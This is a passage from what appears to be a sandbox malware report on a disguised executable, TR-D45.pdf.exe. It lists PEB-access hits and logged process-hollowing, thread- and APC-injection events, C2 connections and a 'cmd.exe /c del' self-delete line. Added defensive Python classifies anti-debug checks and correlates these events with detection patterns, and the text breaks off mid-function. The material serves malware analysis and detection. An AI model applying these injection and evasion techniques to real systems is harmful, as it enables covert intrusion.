      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445B944 mov eax, dword ptr fs:[00000030h]12_2_0445B944
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04473D43 mov eax, dword ptr fs:[00000030h]12_2_04473D43
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B3540 mov eax, dword ptr fs:[00000030h]12_2_044B3540
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04457D50 mov eax, dword ptr fs:[00000030h]12_2_04457D50
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C962 mov eax, dword ptr fs:[00000030h]12_2_0443C962
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B171 mov eax, dword ptr fs:[00000030h]12_2_0443B171
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B171 mov eax, dword ptr fs:[00000030h]12_2_0443B171
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445C577 mov eax, dword ptr fs:[00000030h]12_2_0445C577
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445C577 mov eax, dword ptr fs:[00000030h]12_2_0445C577
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439100 mov eax, dword ptr fs:[00000030h]12_2_04439100
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439100 mov eax, dword ptr fs:[00000030h]12_2_04439100
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439100 mov eax, dword ptr fs:[00000030h]12_2_04439100
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508D34 mov eax, dword ptr fs:[00000030h]12_2_04508D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov ecx, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443AD30 mov eax, dword ptr fs:[00000030h]12_2_0443AD30
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FE539 mov eax, dword ptr fs:[00000030h]12_2_044FE539
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446513A mov eax, dword ptr fs:[00000030h]12_2_0446513A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446513A mov eax, dword ptr fs:[00000030h]12_2_0446513A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044BA537 mov eax, dword ptr fs:[00000030h]12_2_044BA537
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04464D3B mov eax, dword ptr fs:[00000030h]12_2_04464D3B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04464D3B mov eax, dword ptr fs:[00000030h]12_2_04464D3B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04464D3B mov eax, dword ptr fs:[00000030h]12_2_04464D3B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov ecx, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B1E1 mov eax, dword ptr fs:[00000030h]12_2_0443B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B1E1 mov eax, dword ptr fs:[00000030h]12_2_0443B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B1E1 mov eax, dword ptr fs:[00000030h]12_2_0443B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044C41E8 mov eax, dword ptr fs:[00000030h]12_2_044C41E8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E0 mov eax, dword ptr fs:[00000030h]12_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E0 mov eax, dword ptr fs:[00000030h]12_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044E8DF1 mov eax, dword ptr fs:[00000030h]12_2_044E8DF1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A185 mov eax, dword ptr fs:[00000030h]12_2_0446A185
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445C182 mov eax, dword ptr fs:[00000030h]12_2_0445C182
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462990 mov eax, dword ptr fs:[00000030h]12_2_04462990
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446FD9B mov eax, dword ptr fs:[00000030h]12_2_0446FD9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446FD9B mov eax, dword ptr fs:[00000030h]12_2_0446FD9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044661A0 mov eax, dword ptr fs:[00000030h]12_2_044661A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044661A0 mov eax, dword ptr fs:[00000030h]12_2_044661A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044635A1 mov eax, dword ptr fs:[00000030h]12_2_044635A1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B69A6 mov eax, dword ptr fs:[00000030h]12_2_044B69A6
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04461DB5 mov eax, dword ptr fs:[00000030h]12_2_04461DB5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04461DB5 mov eax, dword ptr fs:[00000030h]12_2_04461DB5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04461DB5 mov eax, dword ptr fs:[00000030h]12_2_04461DB5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045005AC mov eax, dword ptr fs:[00000030h]12_2_045005AC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045005AC mov eax, dword ptr fs:[00000030h]12_2_045005AC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FAE44 mov eax, dword ptr fs:[00000030h]12_2_044FAE44
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FAE44 mov eax, dword ptr fs:[00000030h]12_2_044FAE44
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FEA55 mov eax, dword ptr fs:[00000030h]12_2_044FEA55
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044C4257 mov eax, dword ptr fs:[00000030h]12_2_044C4257
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444766D mov eax, dword ptr fs:[00000030h]12_2_0444766D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EB260 mov eax, dword ptr fs:[00000030h]12_2_044EB260
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EB260 mov eax, dword ptr fs:[00000030h]12_2_044EB260
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508A62 mov eax, dword ptr fs:[00000030h]12_2_04508A62
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447927A mov eax, dword ptr fs:[00000030h]12_2_0447927A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C600 mov eax, dword ptr fs:[00000030h]12_2_0443C600
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C600 mov eax, dword ptr fs:[00000030h]12_2_0443C600
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C600 mov eax, dword ptr fs:[00000030h]12_2_0443C600
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04468E00 mov eax, dword ptr fs:[00000030h]12_2_04468E00
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1608 mov eax, dword ptr fs:[00000030h]12_2_044F1608
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04448A0A mov eax, dword ptr fs:[00000030h]12_2_04448A0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov eax, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov ecx, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov eax, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov eax, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443AA16 mov eax, dword ptr fs:[00000030h]12_2_0443AA16
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443AA16 mov eax, dword ptr fs:[00000030h]12_2_0443AA16
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04453A1C mov eax, dword ptr fs:[00000030h]12_2_04453A1C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A61C mov eax, dword ptr fs:[00000030h]12_2_0446A61C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A61C mov eax, dword ptr fs:[00000030h]12_2_0446A61C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443E620 mov eax, dword ptr fs:[00000030h]12_2_0443E620
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04474A2C mov eax, dword ptr fs:[00000030h]12_2_04474A2C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04474A2C mov eax, dword ptr fs:[00000030h]12_2_04474A2C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EFE3F mov eax, dword ptr fs:[00000030h]12_2_044EFE3F
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04478EC7 mov eax, dword ptr fs:[00000030h]12_2_04478EC7
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508ED6 mov eax, dword ptr fs:[00000030h]12_2_04508ED6
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044636CC mov eax, dword ptr fs:[00000030h]12_2_044636CC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462ACB mov eax, dword ptr fs:[00000030h]12_2_04462ACB
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EFEC0 mov eax, dword ptr fs:[00000030h]12_2_044EFEC0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462AE4 mov eax, dword ptr fs:[00000030h]12_2_04462AE4
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044616E0 mov ecx, dword ptr fs:[00000030h]12_2_044616E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044476E2 mov eax, dword ptr fs:[00000030h]12_2_044476E2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CFE87 mov eax, dword ptr fs:[00000030h]12_2_044CFE87
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446D294 mov eax, dword ptr fs:[00000030h]12_2_0446D294
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446D294 mov eax, dword ptr fs:[00000030h]12_2_0446D294
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044352A5 mov eax, dword ptr fs:[00000030h]12_2_044352A5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044352A5 mov eax, dword ptr fs:[00000030h]12_2_044352A5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044352A5 mov eax, dword ptr fs:[00000030h]12_2_044352A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\control.exe | Process token adjusted: Debug
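      The PEB-read evidence above is a list of functions containing `mov eax/ecx, dword ptr fs:[00000030h]`. In a 32-bit process the FS segment base is the TEB, and offset 0x30 of the TEB holds the pointer to the PEB; packers such as GuLoader then dereference that pointer for BeingDebugged (PEB+0x02), the loader data Ldr (PEB+0x0C, used to walk loaded modules and resolve APIs without an import table) or NtGlobalFlag (PEB+0x68). The scanner below is an added example, not code from the Joe Sandbox report or from the sample: it finds the fs:[30h] loads in a raw code buffer by their byte encodings and names the PEB field touched by the instruction that follows, which is the classification a reverser wants before stepping through hundreds of hits. The code buffer and image base at the bottom are constructed for the example.

```python
"""Locate x86 reads of the PEB pointer (fs:[30h]) in a code buffer and
classify what the code does with it. Added example; not from the report."""
import re

REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Encodings of `mov r32, dword ptr fs:[0x30]` in 32-bit code:
#   64 A1 30 00 00 00        mov eax, fs:[30h]            (moffs32 form)
#   64 8B /r 30 00 00 00     mov r32, dword ptr fs:[30h]  (ModRM mod=00 rm=101 + disp32)
# The ModRM byte of the second form is 0x05 | (reg << 3): 05 eax, 0D ecx, 15 edx, ...
PEB_LOAD = re.compile(
    rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00"
)


def classify_follow(tail: bytes, reg: int) -> str:
    """Heuristic: name the PEB field read by the instruction right after the load.

    `reg` holds the PEB pointer. esp-relative addressing needs a SIB byte and
    is not handled; anything unrecognised is reported as "unknown".
    """
    if reg == 4 or len(tail) < 3:
        return "unknown"
    base = 0x40 | reg  # ModRM with mod=01 (disp8) and rm=reg
    # movzx r32, byte ptr [reg+2]   -> 0F B6 /r 02
    if len(tail) >= 4 and tail[:2] == b"\x0f\xb6" and (tail[2] & 0xC7) == base and tail[3] == 0x02:
        return "BeingDebugged (PEB+0x02)"
    # cmp byte ptr [reg+2], 0       -> 80 /7 02 00
    if len(tail) >= 4 and tail[0] == 0x80 and tail[1] == (0x78 | reg) and tail[2:4] == b"\x02\x00":
        return "BeingDebugged (PEB+0x02)"
    # mov r32, dword ptr [reg+disp8] -> 8B /r disp8
    if tail[0] == 0x8B and (tail[1] & 0xC7) == base:
        disp = tail[2]
        if disp == 0x0C:
            return "Ldr (PEB+0x0C), module list walk"
        if disp == 0x68:
            return "NtGlobalFlag (PEB+0x68)"
        return f"PEB+0x{disp:02X}"
    return "unknown"


def find_peb_reads(code: bytes, image_base: int) -> list:
    """One record per fs:[30h] load: virtual address, the mnemonic in the
    report's spelling, and the heuristic classification of its use."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        insn = m.group()
        reg = 0 if insn[1] == 0xA1 else (insn[2] >> 3) & 7
        hits.append({
            "va": image_base + m.start(),
            "mnemonic": f"mov {REG_NAMES[reg]}, dword ptr fs:[00000030h]",
            "use": classify_follow(code[m.end():m.end() + 4], reg),
        })
    return hits


# Constructed input (not bytes from the sample): three PEB loads, each followed
# by one of the dereference patterns above, plus a little filler.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                   # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"       # mov eax, fs:[30h]
    b"\x0f\xb6\x40\x02"               # movzx eax, byte ptr [eax+2]
    b"\x85\xc0"                       # test eax, eax
    b"\x75\x10"                       # jnz short +10h
    b"\x64\x8b\x0d\x30\x00\x00\x00"   # mov ecx, dword ptr fs:[30h]
    b"\x8b\x41\x0c"                   # mov eax, [ecx+0Ch]
    b"\x64\x8b\x05\x30\x00\x00\x00"   # mov eax, dword ptr fs:[30h]
    b"\x8b\x40\x68"                   # mov eax, [eax+68h]
    b"\xc3"                           # ret
)
SAMPLE_BASE = 0x00401000  # made-up image base for the constructed buffer


if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE_CODE, SAMPLE_BASE):
        # Same shape as the report's "Code function: <pid>_<run>_<va> <instruction>" rows.
        print(f"Code function: 1_2_{h['va']:08X} {h['mnemonic']}  ->  {h['use']}")
```

      Run against a dumped section of the unpacked stage (for example the 1E26xxxx region of process 1 above, at its real base) this turns the flat list of hits into a short list of anti-debug checks versus API-resolution sites; the follow-up classification is deliberately a one-instruction heuristic, so expect "unknown" where the compiler or packer interleaves other code.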

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe  Network Connect: 54.147.194.143 80
      Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: execute and read and write
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe  Section loaded: unknown  target: C:\Windows\SysWOW64\control.exe  protection: execute and read and write  (2 occurrences)
      Source: C:\Windows\SysWOW64\control.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: read write
      Source: C:\Windows\SysWOW64\control.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe  Thread register set: target process: 3472
      Source: C:\Windows\SysWOW64\control.exe  Thread register set: target process: 3472
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe  Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe  Section unmapped: C:\Windows\SysWOW64\control.exe  base address: 180000
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe  Process created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: C:\Windows\SysWOW64\control.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmp  Binary or memory string: Progman
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmp  Binary or memory string: SProgram Managerl
      Source: explorer.exe, 00000005.00000000.278658305.0000000001128000.00000004.00000020.sdmp  Binary or memory string: ProgmanOMEa
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd,
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
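      Read together, the lines above are a process-hollowing and injection chain in behaviour-event form: RWX sections mapped by TR-D45.pdf.exe into control.exe and explorer.exe, a section unmapped from control.exe at base 0x180000, thread contexts set and an APC queued in other processes, explorer.exe (a system process with no business making outbound HTTP) then connecting to the two C2 IPs, and control.exe finally running `cmd.exe /c del` on the original file. The Python below is an added example, not the report's or the sandbox vendor's code: it correlates events of this shape into named findings and a capped score, and includes the double-extension check the Sigma hit in the summary refers to. The event records are constructed here from the lines above; the report identifies the thread-context target only as PID 3472, so that target is kept as the string "PID 3472" rather than resolved to an image, and the rule weights are arbitrary choices for the example.

```python
"""Correlate sandbox-style behaviour events into injection / evasion findings.
Added example; the EVENTS and BENIGN lists are constructed from the report's
behaviour lines and are not the report's raw data."""
import re
from collections import defaultdict
from typing import Any

SAMPLE = r"C:\Users\user\Desktop\TR-D45.pdf.exe"
CONTROL = r"C:\Windows\SysWOW64\control.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Windows processes that should not originate outbound connections by themselves.
SYSTEM_PROCESS_NAMES = {"explorer.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "control.exe"}
# "invoice.pdf.exe"-style names, the idea behind the Sigma "Suspicious Double Extension" rule.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt|zip)\.(exe|scr|com|pif)$", re.I)
# cmd.exe "/c del <path>" with optional single or double quoting.
DEL_CMD = re.compile(r"\bdel\b\s+[\"']?([^\"']+?)[\"']?\s*$", re.I)

# Arbitrary weights for this example; the total is capped at 100.
WEIGHTS = {
    "process_hollowing": 30, "apc_injection": 20, "system_process_network": 20,
    "thread_context_injection": 15, "rwx_remote_section": 15,
    "self_delete": 10, "double_extension": 10,
}

RWX = "execute and read and write"  # protection string as the report prints it

EVENTS: list[dict[str, Any]] = [  # constructed from the report's HIPS section, in report order
    {"type": "process_create", "source": SAMPLE, "target": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    {"type": "section_map", "source": SAMPLE, "target": EXPLORER, "protection": RWX},
    {"type": "section_map", "source": SAMPLE, "target": CONTROL, "protection": RWX},
    {"type": "section_map", "source": SAMPLE, "target": CONTROL, "protection": RWX},
    {"type": "section_unmap", "source": SAMPLE, "target": CONTROL, "base": 0x180000},
    {"type": "thread_set_context", "source": SAMPLE, "target": "PID 3472"},  # report gives only the PID
    {"type": "apc_queue", "source": SAMPLE, "target": EXPLORER},
    {"type": "network_connect", "source": EXPLORER, "dst": "54.147.194.143", "port": 80},
    {"type": "network_connect", "source": EXPLORER, "dst": "34.102.136.180", "port": 80},
    {"type": "section_map", "source": CONTROL, "target": EXPLORER, "protection": "read write"},
    {"type": "section_map", "source": CONTROL, "target": EXPLORER, "protection": RWX},
    {"type": "thread_set_context", "source": CONTROL, "target": "PID 3472"},
    {"type": "process_create", "source": CONTROL, "target": CMD, "cmdline": f"/c del '{SAMPLE}'"},
]

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
BENIGN: list[dict[str, Any]] = [  # constructed control case; 203.0.113.10 is a TEST-NET address
    {"type": "process_create", "source": EXPLORER, "target": CHROME, "cmdline": ""},
    {"type": "section_map", "source": CHROME, "target": CHROME, "protection": RWX},  # JIT in own process
    {"type": "network_connect", "source": CHROME, "dst": "203.0.113.10", "port": 443},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events: list[dict[str, Any]]) -> dict[str, list[str]]:
    """Return findings keyed by rule name; each value lists the evidence strings."""
    findings: dict[str, list[str]] = defaultdict(list)
    known_images: set[str] = set()           # images seen so far, for the self-delete rule
    unmapped: set[tuple[str, str]] = set()   # (writer, victim) with a section unmapped
    rwx_mapped: set[tuple[str, str]] = set() # (writer, victim) with RWX memory mapped in
    for ev in events:
        src, kind = ev["source"], ev["type"]
        if kind == "process_create":
            image = ev["target"]
            known_images.update({src.lower(), image.lower()})
            if DOUBLE_EXT.search(image):
                findings["double_extension"].append(image)
            m = DEL_CMD.search(ev.get("cmdline", ""))
            if _basename(image) == "cmd.exe" and m and m.group(1).lower() in known_images:
                findings["self_delete"].append(f"{src} -> del {m.group(1)}")
        elif kind == "section_map":
            prot = ev["protection"].lower()
            if src != ev["target"] and "execute" in prot and "write" in prot:
                rwx_mapped.add((src, ev["target"]))
                findings["rwx_remote_section"].append(f"{src} -> {ev['target']}")
        elif kind == "section_unmap" and src != ev["target"]:
            unmapped.add((src, ev["target"]))
        elif kind == "thread_set_context":
            findings["thread_context_injection"].append(f"{src} -> {ev['target']}")
        elif kind == "apc_queue" and src != ev["target"]:
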